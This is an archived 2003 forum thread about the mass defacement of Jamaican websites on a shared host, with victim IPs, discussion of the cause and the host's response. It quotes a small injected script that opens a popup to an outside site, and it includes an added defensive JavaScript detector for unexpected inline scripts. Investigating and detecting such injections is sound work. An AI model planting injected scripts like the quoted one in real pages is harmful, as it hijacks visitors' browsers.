View Full Version : Jamaican websites hacked!
Chris
October 5, 2003, 10:42 PM
I was just informed by sandor that the www.jarealty.com (207.21.234.149) website has been hacked. He also pointed out that the JCS' old website (207.21.234.152) has also been hacked. The hacked sites have the same page with the heading "Command Tribulation - Hacking for Jesus - Ownz with Style". Subsequent checks by me also revealed that www.jamaicaobserver.com (207.21.234.171) was similarly hacked with the same page.
Ok, the list continues ...
www.orcjamaica.com (207.21.234.228) - Office of the Registrar of companies
www.pioj.gov.jm (207.21.234.162) - Planning Institute of Jamaica
www.ugli.com (207.21.234.168)
www.tpdco.org (207.21.234.167) - Tourism Product Development Company
www.jis.gov.jm (207.21.234.181) - Jamaica Information Service
www.infochange.com (207.21.234.129) - Info Exchange (Web Developers)
www.amchamjamaica.org (207.21.234.133) - American Chamber of Commerce
www.jcc.org.jm (207.21.234.151) - Jamaica Chamber of Commerce
www.aaj.com.jm (207.21.234.131) - Airports Authority of Jamaica
www.bigga.com (207.21.234.135) - Bigga soft drinks
www.manley-airport.com.jm (207.21.234.157) - Manley Airport
www.ugigroup.com (207.21.234.176) - UGI group of companies
www.moore.com.jm (207.21.234.174) - Moore business forms
www.cariboutpost.com (207.21.234.138)
www.hawkeye.com.jm (207.21.234.145) - Hawkeye security
www.jamaicancoffee.gov.jm
Based on my knowledge of some of the sites, the common factor is that they were developed, and probably hosted, by Info Exchange Ltd. ???
By the time many of you read this the sites will have been fixed, so here's a screen shot of the page ... http://www.techjamaica.com/images/hacked_page.jpg
sandor
October 5, 2003, 11:18 PM
madness this!
looks like they opened one door and it led to many many rooms.
a couple years ago a PNP-related site (i believe it was the pnpyo) was hacked too ... i might have the screenshot saved somewhere, but i have to check.
Xenocrates
October 5, 2003, 11:30 PM
Just like how the World Trade Centre bombings gave Islam a bad name, these (Portuguese) morons are out to do the same for Christianity. I guess this is where people who've always detested the faith will detest it even more. The Portuguese translation reads:
Many times I try to understand the cause of this much suffering, but for what? The hunger exists, the death - then I remember that [we] are the main causes of this. God, when he created the world, made it wonderful, but man in his ignorance, proved one more time, that we always act on our instincts. When we want something, we forget the rules that God has written [for us], and for this we pay one high price.
Our mission is to nail the word of God to all [places], [even] to proclaim that Jesus died in our place, so that we can be able to possess eternal life, without suffering or sorrow. We believe in the Holy Trinity, and believe in the Salvation [of souls].
...Forever, we [shall] suffer for what we are!!!
The hackers are Brazilian extremists. It's evident in the distinct Latin American dialect of Portuguese they are using (kinda like a heavily broken or patois Spanish). The Portuguese is so badly broken, it was like trying to translate Westmoreland patois into English...
...but these folks are not only targeting Jamaican sites. Their activities have been most rampant in Trinidad & Tobago where they have been attacking websites dealing with Carnival or other adult oriented matter. But these hackers are mindless uneducated zealots. They can't even speak proper Portuguese. >:(
Xenocrates
October 5, 2003, 11:43 PM
I did some checking. Apparently they merely changed the DNS routers for the hacked sites to point to a different host address showing that webpage. I could be wrong...but each hacked site seemed to turn up the same host address. Maybe this is a spoof as well.
...but they're not very smart. They've given away their location. That IRC channel (server: irc.brasnet.org channel: #Commandt) should be pretty easy to spoof and lock down. These have to be some of the dumbest hackers I've seen yet.
I'm not sure whether to feel insulted they put Jesus' name on this trash or to laugh at their idiocy. I'm too disgusted to even react... >:(
BlackCryptoKnight
October 5, 2003, 11:47 PM
Awwww nawwwww!!!! :-X :-X :( >:( >:(
Heck... that kindof stuff leaves a bitter taste in the mouth...
Really nasty stuff...
tech_guru
October 5, 2003, 11:50 PM
I did some checking. Apparently they merely changed the DNS routers for the hacked sites to point to a different host address showing that webpage. I could be wrong...but each hacked site seemed to turn up the same host address. Maybe this is a spoof as well.
...but they're not very smart. They've given away their location. That IRC channel (server: irc.brasnet.org channel: #Commandt) should be pretty easy to spoof and lock down. These have to be some of the dumbest hackers I've seen yet.
I'm not sure whether to feel insulted they put Jesus' name on this trash or to laugh at their idiocy. I'm too disgusted to even react... >:(
These guys are Script Kiddies Website Defacers!!! Simple They learn one hack scan whole subnets then use the automated script they downloaded to deface ppls website..........
I wouldn't try to go after them just secure the hosts...........I am sure most of these sites are running IIS and these guys exploited a very old bug...........
What a set of losers........
igodit
October 6, 2003, 01:24 AM
All of these sites are on the same host.
So that we don't forget this one, here is a screenshot.
Remember when the chinese hackers RadioJamaica.com?
CGPGroup
October 6, 2003, 04:30 AM
It wasn't made public but I think go-jamaica.com was hacked about two weeks ago. I went there and it was just pure Garbage. Sorry I did not take a screen-shot. I am in central Europe (7 hours ahead of Jamaica), when I checked the site it was 2 AM in Kingston so it might have been fixed before you guys woke up. If anybody else saw this about two weeks ago please post.
CGPGroup
October 6, 2003, 04:41 AM
here is their website http://www.proverbiox.hpg.ig.com.br/
it is a directory listing. DO NOT DOWNLOAD ANY OF THE FILES SOME OF THEM ARE VIRUSES
igodit
October 6, 2003, 07:16 AM
CGPGroup, check the board stats, there is someone awake all the time. ;D
And yeah sorry you didn't get a screenshot.
turbo
October 6, 2003, 07:38 AM
I hate the fact that our Saviour Jesus' name was used in this evil deed.
That's what ticks me off the most.
turbo
October 6, 2003, 07:42 AM
Manley airport yet to be fixed
BlackCryptoKnight
October 6, 2003, 09:10 AM
The sites seemed to be fixed now.
Radio stations carried it on the news this morning.
CKnight
October 6, 2003, 09:12 AM
Reports on FAME news this morning state that jamaicaobserver.com's hack wasn't a simple DNS redirection, but rather a full fledged hack. They actually uploaded a set of files to their server and replaced the actual pages.
MiTcHiE
October 6, 2003, 09:19 AM
I must be living somewhere else, i haven't heard anything at all, other than what i have seen here. That's bad :( :(
igodit
October 6, 2003, 09:21 AM
I heard that they were hacked through the Frontpage extensions on the website, more M$ flaws.
Chris
October 6, 2003, 09:25 AM
Reports on FAME news this morning state that jamaicaobserver.com's hack wasn't a simple DNS redirection, but rather a full fledged hack. They actually uploaded a set of files to their server and replaced the actual pages.
But we all know that it wasn't a DNS redirection. The hackers apparently used a Frontpage extension vulnerability allowing them to gain access and run free on the server. They replaced the index files for the websites mentioned.
DarkAngel
October 6, 2003, 09:33 AM
wow is this a first for Jamaican websites, i mean the scale of the attacks?
sandor
October 6, 2003, 09:41 AM
wow is this a first for Jamaican websites, i mean the scale of the attacks?
definitely a first in terms of the scale. but i guess there are not many instances of numerous jamaican web sites being hosted on the same server .. hence many felled with one blow.
i think rjr, go-jamaica, the pnp (still to find the screenshot) have all been hacked in the past (sometimes more than once).
BlackCryptoKnight
October 6, 2003, 09:43 AM
Let's hope that something positive can come out of this. Jamaican websites getting hacked is nothing new...been happen long time. However because this incident has gotten some more publicity, maybe more companies will start to take Information Security more seriously and do what they need to do to keep their websites, and internal systems, safe.
Website defacement is bad, but at least it lets you know that something bad has happened. What about the hacks that you don't easily see? How many websites are out there with your personal information on insecure servers?
How do we know that when a company goes "on line" they are really ready to handle the challenges that await them where security is concerned?
What recourse does the average joe have if his personal info is compromised when a website is hacked?
Let's hope that discussions coming from this incident can help to answer some of these questions and help us move forward.
Ropy
October 6, 2003, 09:53 AM
I think these youths are reading too much hacking magazines.
DarkAngel
October 6, 2003, 09:55 AM
Good work guys (Chris and Sandor). Hope Chris will do a follow up on this- What the guys at infoExchange have to say about this and what steps they are taking to prevent a future occurrence, even if they have nothing to say we want to know.
Looking forward to that.
Chris
October 6, 2003, 10:06 AM
Good work guys (Chris and Sandor). Hope Chris will do a follow up on this- What the guys at infoExchange have to say about this and what steps they are taking to prevent a future occurrence, even if they have nothing to say we want to know.
Looking forward to that.
Thanks DA.
I'll contact them and give them the opportunity to respond.
Xenocrates
October 6, 2003, 01:59 PM
Hey Chris, call me an opportunist, but do you see a major advertisement opportunity for TechJ in this? Or am I spending too much time looking at multiplicities of possibilities with everything? ;D
I think these youths are reading too much hacking magazines.
- Ropy, you seem jealous that they know more than you do ;D
uwill
October 6, 2003, 02:02 PM
Our investigations at Info Exchange led to an unauthorized user from the Brazilian region of Rio Grande do Sul in the city of Porto Alegre. We have secured all the evidence and have forwarded such to the relevant authorities for further investigation.
I want to thank you guys for the work you do at techjamaica especially Chris and Black Crypto even though my team was on top of the issue within a few minutes. My team was also instructed to secure the web servers first and then to secure the evidence.
Our clients, some immediately, were back in full force by 8 a.m. this morning when we decided that everything was cool.
As we all know, security is not a point in time solution but exists on a continuum and we at Info Exchange recognize and acknowledge that fact.
Thanks again
sandor
October 6, 2003, 02:09 PM
Our investigations at Info Exchange led to an unauthorized user from the Brazilian region of Rio Grande do Sul in the city of Porto Alegre. We have secured all the evidence and have forwarded such to the relevant authorities for further investigation.
good luck with that .. hope it's not like a couple of years ago when i was using cwjamaica dialup and another cwjamaica dialup customer tried to drop a trojan on my computer. i gave cwjamaica tech support the exact time and the ip address of the attack. dunno why i thought cwjamaica would be able to use those two bits of evidence to link it back to a particular username .... anyhow, they kindly informed me that they couldn't. wonder if this is still the case
igodit
October 6, 2003, 02:19 PM
What security hole made your host vulnerable to this hack?
uwill
October 6, 2003, 02:37 PM
What security hole made your host vulnerable to this hack?
It was a weak password setting on one of our client maintained sites. Our servers are always being probed by hackers looking for a security hole and we have been able to ward them off so far until last night. Based on a client request, it was the only site with front page extensions and it also had a weak password setting.
All our other sites evidently have very strong passwords except for this one with Front page extensions attached to it. I can categorically state that it was not an O/S vulnerability exploit and our other security measures including patches thwarted the attacker from planting any trojan horses on our servers. We suffered web site defacement and that was the extent of his/her exploit.
BlackCryptoKnight
October 6, 2003, 02:46 PM
Uwill, good to hear things are back under control.
What's the general attitude toward IT security among the organizations you've interacted with? What do you think can be done to make improvements in that area?
Chris
October 6, 2003, 02:49 PM
Hi uwill, thanks for coming on and explaining it to us. We all know, especially me, what these idlers can cause and cost.
All the best in recovering and holding the culprits accountable. We hope to see MORE of you around other than posting about this issue ;)
uwill
October 6, 2003, 03:20 PM
Uwill, good to hear things are back under control.
What's the general attitude toward IT security among the organizations you've interacted with? What do you think can be done to make improvements in that area?
Information security is still in its infancy in Jamaica and to a larger extent the Caribbean. We still think of security as related to the guard at the gate and checking the trunk of the car. We still do not have much regard for the diskette with confidential company info in the top pocket and that is a sad case of affairs. Over 70% of etheft is internal and not external and most companies even though focused on external intrusions install and leave their firewall to maintain itself.
Security is still considered as a point in time solution and you will find companies that do not have active security policies and measures in place state that they are secured. It has been slow in getting to the board level but I think we as technical people need to practice security as well as a continuous exercise rather than fooling the business side into thinking we are secure since we have a firewall!!!!
How many technical gurus can profess that they really understand security and its techniques? The majority of us are not trained or equipped to deal with an all out attack. Such expertise takes considerable reading, training and practice to even scratch the surface.
How many networks are really safe? A few I would guess (DHCP has become such a bad thing!!!) What about patch management, access controls, encryption, secure coding techniques and audit trails? Security is hard work and requires and deserves the attention of all technocrats and business people. Info Exchange has always been vocal on the topic and we continuously educate our clients on this topical issue.
You can never stop an attack on your information assets but you must always be prepared for the eventuality!!! :)
tech_guru
October 6, 2003, 04:40 PM
It was a weak password setting on one of our client maintained sites. Our servers are always being probed by hackers looking for a security hole and we have been able to ward them off so far until last night. Based on a client request, it was the only site with front page extensions and it also had a weak password setting.
All our other sites evidently have very strong passwords except for this one with Front page extensions attached to it. I can categorically state that it was not an O/S vulnerability exploit and our other security measures including patches thwarted the attacker from planting any trojan horses on our servers. We suffered web site defacement and that was the extent of his/her exploit.
So you are saying one host with a weak password allowed the attackers to compromise several other sites??.....Hmmmm.......Should that account have only allowed the attackers to access only the account with weak password??
pigeonflight
October 6, 2003, 04:54 PM
Tech_Guru,
I wouldn't ponder that too hard
matronyx
October 6, 2003, 04:59 PM
hack away!!! hack away!!!
you know ... it could be some jamaican guys who spoofed their intrusion. Ever thought of that?
uwill
October 6, 2003, 05:08 PM
So you are saying one host with a weak password allowed the attackers to compromise several other sites??.....Hmmmm.......Should that account have only allowed the attackers to access only the account with weak password??
On IIS, most sites run under the I_USR anonymous account that has limited permissions for Internet user access. Once scripting is enabled, vbscript or jscript (ASP), then an unauthorized user can run malicious scripts once planted from the browser window to perform attacks on the Internet services as was seen in this case.
Most data intensive and high end web sites do allow access to scripting objects (COM objects) and in our case a lot of our web sites use high end functionality, leaving the possibility of misuse. As seen in our case though, the attacker was able to deface some of our web sites through scripting but did not materially affect our ability to respond.
Thanks
igodit
October 6, 2003, 06:04 PM
Uwill, do you see this event affecting your company's web hosting integrity?
How do you plan to counter future attacks on yourself, meaning your company and your clients which you host?
Also will there be any follow up to have the person(s) held accountable, or will it just be passed off as just another hack?
Are there plans to go Linux?
http://neowin.net/images/news/logos/linux.gif
uwill
October 6, 2003, 06:25 PM
Uwill, do you see this event affecting your company's web hosting integrity?
How do you plan to counter future attacks on yourself, meaning your company and your clients which you host?
Also will there be any follow up to have the person(s) held accountable, or will it just be passed off as just another hack?
Are there plans to go Linux?
Quite to the contrary, Info Exchange has received accolades from the business and the tech communities alike. Our web hosting integrity is still intact as we are still regarded as leaders in our industry. CNN, Department of Defense, Yahoo and other more prominent sites have been the center of attacks and defacements and since those attacks are inevitable, it has been the way they respond to such incidences that have made them remain on top.
Future attacks will be countered by reducing the surface area for attacks to a minimum, client education and increased vigilance. There will be strong followup as far as we can take it through local and international authorities. The ISP in Brazil has already been contacted to supply further information on the culprit.
At Info Exchange, we are always looking for the next best thing and Linux has always been on our radar but moving to Linux has not been contemplated at this time.
BlackCryptoKnight
October 7, 2003, 08:55 AM
The Observer posted an article about the incident today:
http://www.jamaicaobserver.com/news/html/20031007T010000-0500_49985_OBS_HACKING_OF_OBSERVER_WEBSITE_TRACED_TO_BRAZIL.asp
It makes mention of a Cybercrime Unit of the local Police. I never knew they had such a unit. Does anyone know any more about it? How many people are attached to it and what kind of training they've had?
sandor
October 7, 2003, 09:09 AM
interesting fi real .. didn't know there was a cyber crime unit. funny we get a cyber crime unit before we even have cyber crime laws .. hmmmm
i'm a bit disappointed though in both the observer article above and the radio jamaica news item (http://www.radiojamaica.com/news/?id=5454) yesterday because both kinda mix up the facts. they almost make it seem as though the hacks were all 'independent' when really, one was a backdoor basically to all and they're all connected like that.
like this taken from the observer article "At the same time, David Allen, CEO of Info Exchange Ltd, also reported yesterday that its website was hacked Sunday night, and also traced the hacking to a provider in Brazil." .. makes it kinda seem like "ohhh yeah, we got hacked too"
sandor
October 7, 2003, 09:10 AM
uhmmmm .. i think i was hacked .. that last post look like it gone berserk
sandor
October 7, 2003, 09:11 AM
ahmmmm ... am i the only one seeing this? it wasn't me
BlackCryptoKnight
October 7, 2003, 09:15 AM
I see it too...
Dunno what's going on...
BlackCryptoKnight
October 7, 2003, 09:18 AM
Fixed it. Something was wrong with a previous post.
xphat
October 7, 2003, 11:05 AM
Interesting indeed ;)
;D
DarkAngel
October 7, 2003, 11:08 AM
Yes guys there is a Jamaican cybercrime unit, the unit is a part of the new crime fighting "squad", i can't remember the name of the squad but it was setup about a month ago. Do you guys remember that fraud case involving Xoom.com (described by some Media house as Jamaica's first case of a cyber crime) in September? well the Cyber Crime Unit i think was one of the groups involved in gettin the women allegedly involved in the crime.
I would love to know more about this unit - I'm wondering if they have the expertise and equipment to deal with the task involved.
I have suggested to Chris that he do some research on them and let the community know of the findings.
Btw Techjamaica.com got mentioned in that observer article - now isn't that nice. :)
tech_guru
October 7, 2003, 11:13 AM
Take a look at http://www.zone-h.org/en/defacements/view/id=493445/
BlackCryptoKnight
October 7, 2003, 11:26 AM
Take a look at http://www.zone-h.org/en/defacements/view/id=493445/
Thanks Guru...I was trying to remember the name of that site.
I did a search for "jamaica" on it and this is what I found:
http://www.zone-h.org/en/search/what=jamaica/
A list of Jamaican websites that have been defaced. :-\
BlackCryptoKnight
October 7, 2003, 11:30 AM
Thanks Guru...I was trying to remember the name of that site.
I did a search for "jamaica" on it and this is what I found:
http://www.zone-h.org/en/search/what=jamaica/
A list of Jamaican websites that have been defaced. :-\
Searched for ".jm" and got this http://www.zone-h.org/en/search/what=.jm/
igodit
October 7, 2003, 11:42 AM
I only heard of this Cyber Crime Unit when the incident with Xoom.com occured. But I hear that they had assistance from the US feds.
So about our own local independence I'm not so sure we even on par with the rest of the world on cyber security, though a lot of us know how to break it, most of us are just "script kiddies" too.
And to be honest that Cyber Crime unit seems like dem working with the TAT (Try A Ting) policy.
igodit
October 7, 2003, 11:57 AM
Just read the Jamaica Observer's article on the hack.
"OBSERVER technicians yesterday traced the hacking of the newspaper's website Sunday night to an Internet address in Brazil and have asked the service provider to help in tracking down the users who attempted to launch a virus onto the company's computer system."
Do IT people truly refer to themselves as a Technician anymore, let me feel like I fix fridge and AC units.
Like the little kudos we getting for our security focus.
But honestly now, does it even make sense to go after a website defacer, then again as we all notice a lot of police on the road, which is a good thing. So maybe the Cyber Crime people need something to do too. Maybe they should start posting pictures of them on some Jamaican websites to intimidate some hackers ;D
---
Like yesterday I saw one of the policemen directing traffic in front of UWI Hospital gate. If some of you know how that road is situated and to see him do that, you would probably want to run him over for stupidity.
tech_guru
October 7, 2003, 12:50 PM
Thanks Guru...I was trying to remember the name of that site.
I did a search for "jamaica" on it and this is what I found:
http://www.zone-h.org/en/search/what=jamaica/
A list of Jamaican websites that have been defaced. :-\
I was looking checking for www.alladas.de -- site is dead now however :( :(
They gave good reporting i.e. the type of attack and allowed you to check if the site is still vulnerable.....Plus their list was more comprehensive!!
jamrock
October 7, 2003, 01:15 PM
Here are my questions...
Was the box hosting the sites hacked or did someone breach the DNS server and redirect the traffic to another I.P. address?
Let us assume the web server was hacked...
What kind of forensic work has been done to make sure that the hackers didn't leave any
sniffers (to get passwords)
trojans
back doors
virus code
on the servers?
Recently, jabber.org was hacked and the administrators locked down the site for a few weeks while they did a complete forensic analysis of the site and the downloadable code.
Did the site administrators restore the site from a clean backup or did they just continue as usual?
If all the machines are on the same host, can one site's directories be infected with a trojan, sniffer or whatever that affects the sites of all the others?
Just asking... I don't have the answers. Just trying to figure out what I would have done in that situation. Any way you look at it, it is not pretty.
Xenocrates
October 7, 2003, 02:02 PM
Jamrock - as was mentioned numerous times in previous posts to this thread, it wasn't a DNS redirection. The webserver was hacked, and the main page overwritten with an uploaded defacement. I actually posed this very same question at the beginning of the thread.
jamrock
October 7, 2003, 05:28 PM
Jamrock - as was mentioned numerous times in previous posts to this thread, it wasn't a DNS redirection. The webserver was hacked, and the main page overwritten with an uploaded defacement. I actually posed this very same question at the beginning of the thread.
I have asked for a reason. I heard from other sources that it was a DNS redirection.
Chris
October 7, 2003, 05:41 PM
...I have suggested to Chris that he do some research on them and let the community know of the findings.
Yes DA, I'm working on it ;)
Btw Techjamaica.com got mentioned in that observer article - now isn't that nice. :)
Nice indeed! ;D
Chris
October 8, 2003, 05:58 PM
Just letting you guys know that I'll be in a radio interview on KLAS FM's morning show (First Edition) tomorrow, Thursday, at 6:15am. Also of interest to some of you is that a representative from the Cyber Crime Unit will also be on. The topic will be hacking and I've already made it clear that I will not discuss any details about the recent defacements.
Arch_Angel
October 8, 2003, 09:22 PM
sets his alarm clock to 6 am.
But why so early though? Is that when most persons will be stuck in traffic and listening to their radios?
Will be interesting to know more about the CCU.
BlackCryptoKnight
October 9, 2003, 06:42 AM
Posted by: Chris Posted on: Yesterday at 05:58:05pm Just letting you guys know that I'll be in a radio interview on KLAS FM's morning show (First Edition) tomorrow, Thursday, at 6:15am. Also of interest to some of you is that a representative from the Cyber Crime Unit will also be on. The topic will be hacking and I've already made it clear that I will not discuss any details about the recent defacements.
Chris represented well on KLAS FM89 this morning.
Well done man 8) 8) 8)
DarkAngel
October 9, 2003, 09:22 AM
Chris represented well on KLAS FM89 this morning.
Well done man 8) 8) 8)
It's 9:20 am and i'm just reading this portion of the thread, which means i am just finding out about the interview and have missed it completely. I suggest that Chris create a new thread next time around.
Good to know however that he "represented well". 8)
sandor
October 9, 2003, 09:32 AM
audio upload? all now we overseas still can't see that smile jamaica video
sandor
October 9, 2003, 01:22 PM
is anyone else seeing this .... go to http://www.jamaicaobserver.com
do you get a popup for a brazilian site?
i have a feeling whatever hacking was done, some remnants of something still exists .. maybe a trojan, script or something .. hence the weird popup for that brazilian site that i am getting every time i refresh the jamaicaobserver.com
actually .. i am not getting it any more .. .but i have a feeling there is some cookied/time-delay thing still going on with those sites that were hacked.
CKnight
October 9, 2003, 01:31 PM
Duuuuuuuude, I'm getting it too. Wiiiiiierd.
You know what I'm thinking right now? I think a lot of persons have put their foot in their respective mouths.
How can this popup remain if there was the quick and effective response that I heard about on the radio and this board?
Yummm...leather...
sandor
October 9, 2003, 01:39 PM
what's this code doing ...
<script language="JavaScript"><!--
function popwin(url,width,height) {
if ((width==null)||(width=='')) {
width=300;
}
if ((height==null)||(height=='')) {
height=300;
}
var newwin = window.open(url,'new_win','width='+width+',height='+height+',toolbars=no,scrollbars=yes,status=no,resizable=yes');
}
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
var IE4 = document.all;
var NS4 = document.layers;
function enter_key_trap( e ) {
var keyPressed;
if (window.event.srcElement.name!='stext')
return;
if ( NS4 )
keyPressed = String.fromCharCode( e.which );
else if ( IE4 )
keyPressed = String.fromCharCode( window.event.keyCode );
if ( keyPressed == "\r" || keyPressed == "\n" ) {
document.forms['searchform'].submit();
}
}
// Setup the enter keytrap code
if (window.document.captureEvents != null) {
window.document.captureEvents(Event.KEYPRESS);
window.document.onkeypress = enter_key_trap;
}
//--></script>
CKnight
October 9, 2003, 01:43 PM
Screenshot. Just in case it's removed before everyone gets a peek.
BlackCryptoKnight
October 9, 2003, 02:06 PM
I didn't see it at all. Is it evident with any of the other sites that were defaced?
CKnight
October 9, 2003, 02:24 PM
what's this code doing ...
That code doesn't look too malicious, but I'm no programmer, I only play one on TV.
CKnight
October 9, 2003, 02:34 PM
TechJamaica.com - Covering hacks as they happen.
Upon subsequent reloading of the website I stopped getting the popup also.
I compared the page source of the page that has the popup with the code from the site without it and found the offending code:
<script language="JavaScript">
var width = 800;
var height = 600;
var left = 99;
var top = 99;
URL = "http://www.minhabusca.com.br";
window.open(URL);
</script>
It starts on line 96.
This proves that depending on your timing, you will view one of two (or more) different web pages; one which loads a popup and one which does not.
The question now is as asked by sandor:
is there some "cookied/time-delay thing" still going on with those sites that were hacked?
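The comparison described in the post above (page source with the popup against page source without it) can be automated. The following is an added example, not code from the thread or from any of the sites involved: it lists inline script blocks that appear in a served page but not in a known-good baseline, and flags `window.open` calls and off-site URLs in them. The sample pages and the host name `news.example` are constructed; the injected block is the one quoted in the post.

```javascript
'use strict';

// Return the body of every inline <script> block in an HTML string.
// Blocks that load an external file via src= have no inline body and are skipped.
function extractInlineScripts(html) {
  const blocks = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (/\bsrc\s*=/i.test(m[1])) continue;
    blocks.push(m[2]);
  }
  return blocks;
}

// Collapse whitespace so re-indented but otherwise identical code compares equal.
function normalise(code) {
  return code.replace(/\s+/g, ' ').trim();
}

// Absolute URLs in the code whose host is neither siteHost nor a subdomain of it.
function offSiteUrls(code, siteHost) {
  const urls = code.match(/https?:\/\/[^\s"'<>)]+/gi) || [];
  return urls.filter((u) => {
    let host;
    try { host = new URL(u).hostname.toLowerCase(); } catch { return true; }
    return host !== siteHost && !host.endsWith('.' + siteHost);
  });
}

// Compare a served page with a known-good baseline and describe every
// inline script block that the baseline does not contain.
function auditPage(baselineHtml, servedHtml, siteHost) {
  const known = new Set(extractInlineScripts(baselineHtml).map(normalise));
  const findings = [];
  extractInlineScripts(servedHtml).forEach((body, index) => {
    const code = normalise(body);
    if (known.has(code)) return;
    findings.push({
      index, // position among the served page's inline script blocks
      opensWindow: /\bwindow\s*\.\s*open\s*\(/.test(code),
      redirects: /\blocation\s*(\.\s*(href|replace|assign))?\s*[=(]/.test(code),
      offSite: offSiteUrls(code, siteHost),
      code,
    });
  });
  return findings;
}

// Constructed baseline: one external script and one legitimate inline helper.
const BASELINE_HTML = `
<html><head>
<script src="/js/menu.js"></script>
<script language="JavaScript">function popwin(url) { window.open(url, 'new_win'); }</script>
</head><body>Front page</body></html>`;

// Constructed served copy: same helper re-indented, plus the block quoted in the post.
const SERVED_HTML = `
<html><head>
<script src="/js/menu.js"></script>
<script language="JavaScript">
  function popwin(url) {
    window.open(url, 'new_win');
  }
</script>
<script language="JavaScript">
var width = 800;
var height = 600;
var left = 99;
var top = 99;
URL = "http://www.minhabusca.com.br";
window.open(URL);
</script>
</head><body>Front page</body></html>`;

for (const f of auditPage(BASELINE_HTML, SERVED_HTML, 'news.example')) {
  console.log(`unexpected inline script #${f.index}: ` +
    `opensWindow=${f.opensWindow} redirects=${f.redirects} offSite=${f.offSite.join(',')}`);
}
```

Because the popup only appeared on some loads, a check like this needs to run repeatedly against the live page, and the baseline should come from the clean source tree rather than from the server that was compromised.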
tech_guru
October 9, 2003, 02:50 PM
Rather Interesting Developments!!!
Sits back and wait for the Latest News!!!
GodKid
October 9, 2003, 08:11 PM
sandor.. .that looks like a bunch o Dreamweaver inserted code for three Javascript events... one is setting up a new window... one is setting the timeline for a perpetual reload... that last one is kinda tricky tho.. and I'd have to take a guess at it being some kind of key binding...binding the letter "e" ... try pressing e on the page and seeing what happens ;D
Arch_Angel
October 9, 2003, 11:25 PM
Anyone contacted the webmaster for the site? Just in case they don't know about it. Not the dreamweaver code, but the popup.
BlackCryptoKnight
October 10, 2003, 08:32 AM
Anyone contacted the webmaster for the site? Just in case they don't know about it. Not the dreamweaver code, but the popup.
They were contacted earlier in the day and were working on the situation.
uwill
October 10, 2003, 04:08 PM
what's this code doing ...
<script language="JavaScript"><!--
function popwin(url,width,height) {
if ((width==null)||(width=='')) {
width=300;
}
if ((height==null)||(height=='')) {
height=300;
}
var newwin = window.open(url,'new_win','width='+width+',height='+height+',toolbars=no,scrollbars=yes,status=no,resizable=yes');
}
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
var IE4 = document.all;
var NS4 = document.layers;
function enter_key_trap( e ) {
var keyPressed;
if (window.event.srcElement.name!='stext')
return;
if ( NS4 )
keyPressed = String.fromCharCode( e.which );
else if ( IE4 )
keyPressed = String.fromCharCode( window.event.keyCode );
if ( keyPressed == "\r" || keyPressed == "\n" ) {
document.forms['searchform'].submit();
}
}
// Setup the enter keytrap code
if (window.document.captureEvents != null) {
window.document.captureEvents(Event.KEYPRESS);
window.document.onkeypress = enter_key_trap;
}
//--></script>
The first javascript function is a custom popup window function that takes a url and height and width ... the second javascript function corrects a Netscape 4 bug when you resize the browser window and the third function checks to see if the "enter" key was pressed in the search box and submits the search automatically.
These scripts are perfectly harmless!
igodit
October 10, 2003, 04:54 PM
Question is, was it on the Jamaica Observer website?
How did it get there?
Was it a hack?
BlackCryptoKnight
October 30, 2003, 11:21 AM
Has anyone heard any updates on the progress of the investigations?
BlackCryptoKnight
December 15, 2003, 11:43 AM
I searched for "Jamaica" on http://www.zone-h.org and found that there have been more Jamaican websites that have been recently hacked and defaced. (November 21, 2003) :(
These defacements were done by a group called the XFree Team. Apparently it was a mass defacement as with the case of the Brazilian hackers in October. The following websites were victims:
11/21/2003: http://www.lifepathjamaica.com
11/21/2003: http://www.rotaryjamaica.org
11/21/2003: http://www.galaxyjamaica.com
11/21/2003: http://galaxyjamaica.com
A search for the .jm domain showed that the following websites were also victims of the same defacement incident:
(see http://www.zone-h.org/en/search/what=.jm/ )
11/21/2003: http://psj.org.jm
11/21/2003: http://porterbrothers.com.jm
11/21/2003: http://ncda.org.jm
11/21/2003: http://ild.org.jm
11/21/2003: http://abs.com.jm
These sites were all hosted on the same server - which was running Apache on Linux.
Jamaican webmasters/hosting providers - ensure that you have taken steps to secure your websites and the websites of your clients.
Jamaican companies - make sure that your website hosting provider is serious about security, and make sure that you are too ;)
MiTcHiE
December 15, 2003, 03:16 PM
Servers running linux???? Do my eyes trick me?? :o :o ::) ::)
BlackCryptoKnight
December 15, 2003, 04:14 PM
Servers running linux???? Do my eyes trick me?? :o :o ::) ::)
They trick you not Mitchie. It just goes to show that vulnerabilities and exploits are serious problems for many platforms and applications.
jamrock
December 16, 2003, 04:37 AM
Servers running linux???? Do my eyes trick me??
If one does not properly secure a Linux server, it can be hacked as easily as a Windows server. Even properly secured Linux servers can be hacked when new exploits are discovered.
The only way to fully secure any server is to plug out the cable and turn it off. ;D
My reading suggests some important steps.
secure the server to make it difficult for someone to hack it.
secure the machines that access the server.
Put in intrusion detection software so you can know if someone hacks the box.
Implement good backup and data recovery procedures so that you can restore a clean copy of your server if it gets hacked.
Check your logs daily for signs of intrusion
Securing a server is like securing a car. Someone will break in if he/she has the time, skill and patience. You can make it so difficult, however, that the attacker chooses an easier victim.
jamrock
December 16, 2003, 04:42 AM
By the way, I was reading a book where they recommended putting intrusion detection software before the firewall and behind the firewall.
The IDS before the firewall tells you the types of attacks that are being formulated against your network. The firewall behind the firewall tells you the attacks that have been successful.
The first firewall gives you advance notice and allows you to adjust your firewall settings as you see new types of attacks taking place.
Interesting concept...
ramesh
December 16, 2003, 10:40 AM
<!--Start shameless plug>
Good thing http://www.souvenirworldja.com/ not on that list!
<!--End shameless plug>
BlackCryptoKnight
December 16, 2003, 01:39 PM
<!--Start shameless plug>
Good thing http://www.souvenirworldja.com/ not on that list!
<!--End shameless plug>
Be careful about shameless plugs. That one looked like a challenge Ramesh ;)
ramesh
December 16, 2003, 11:17 PM
Nh! No one on this website going attack my almost useless shamelessly plugged website, right? Right? Right??!? :o
